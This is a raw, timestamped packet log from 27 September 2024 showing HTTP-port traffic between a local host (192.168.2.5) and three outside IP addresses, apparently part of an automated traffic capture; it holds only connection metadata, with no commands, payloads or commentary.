Sep 27, 2024 04:21:16.374552965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374560118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374573946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374586105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374602079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374602079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374784946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374806881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374824047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374835014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374845028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374855042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374866009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374875069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374875069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374878883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374892950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374901056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374905109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374916077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374927044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374938965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374947071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374947071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.375224113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.394365072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394426107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394438028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394479036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394490004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394500017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394511938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.394514084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.394514084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.394560099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.394560099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.395565987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395590067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395601034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395657063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.395680904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395693064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395704031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395715952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.395720959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.395720959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.395756960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.395777941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.396142960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396153927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396164894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396173954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396186113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396207094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.396253109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.396265984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396277905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396290064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396301031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396311998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396313906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.396322966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396334887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396348953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.396384001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.396404982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396415949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.396456003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.397934914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.397964954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.397974968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398010015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398025036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398036957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398037910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398050070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398062944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398066998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398094893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398118019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398227930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398238897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398247957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398257017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398267031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398277998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398278952 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398288012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398298025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398308992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398310900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398320913 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398344994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398364067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398386955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398427010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398610115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398621082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398629904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398634911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398643017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398653030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398658037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398667097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398674965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398679018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398689985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398699045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398705959 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398710012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398719072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398722887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398735046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398740053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398744106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398762941 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398791075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.398976088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398986101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.398996115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399005890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399015903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399024010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399027109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399038076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399053097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399056911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399069071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399075031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399080038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399091959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399101973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399111986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399118900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399123907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399135113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399141073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399148941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399174929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399362087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399377108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399399042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399409056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399418116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399422884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399422884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399427891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399441004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.399454117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399466991 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.399482012 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404695034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404706955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404717922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404777050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404783010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404815912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404820919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404827118 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404834032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404860973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404874086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404885054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404896021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404906988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404918909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.404922962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404936075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.404958963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.405019999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.405030966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.405042887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.405056000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.405061007 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.405092955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.426794052 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.427084923 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.430439949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430465937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430476904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430538893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.430538893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.430546045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430557966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430574894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430625916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.430625916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.430655003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.430706024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.431763887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431776047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431786060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431840897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.431840897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.431864023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431874990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431885958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431898117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.431915045 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.431946039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.432001114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432013035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432023048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432034969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432045937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432053089 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.432058096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432071924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.432101011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.432148933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.432161093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432172060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432187080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432194948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.432234049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432240009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.432240009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.432248116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432270050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432281971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.432287931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.432287931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.432320118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.432320118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.436742067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436769009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436779022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436820030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436829090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436839104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436839104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.436839104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.436845064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436851025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.436882019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.436944008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437113047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437123060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437133074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437163115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437170029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437174082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437181950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437186956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437199116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437226057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437252045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437378883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437459946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437484026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437509060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437516928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437525988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437536955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437546968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437573910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437573910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437597990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437608957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437618971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.437660933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.437660933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438347101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438373089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438381910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438430071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438430071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438440084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438451052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438462019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438472033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438482046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438508034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438508034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438548088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438698053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438746929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438750029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438760996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438771009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438806057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438806057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438838959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438849926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438858986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.438889980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.438889980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439158916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439168930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439181089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439189911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439218998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439229965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439233065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439233065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439241886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439251900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439258099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439290047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439349890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439392090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439400911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439404964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439440012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439441919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439449072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439454079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439466953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439476967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439482927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439516068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439516068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439553976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439563990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439572096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439583063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439590931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439605951 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439683914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439694881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439707041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439713955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.439721107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439721107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.439757109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.446022034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446048975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446058989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446127892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446126938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.446126938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.446139097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.446151018 CEST	80	49724	176.113.115.95	192.168.2.5
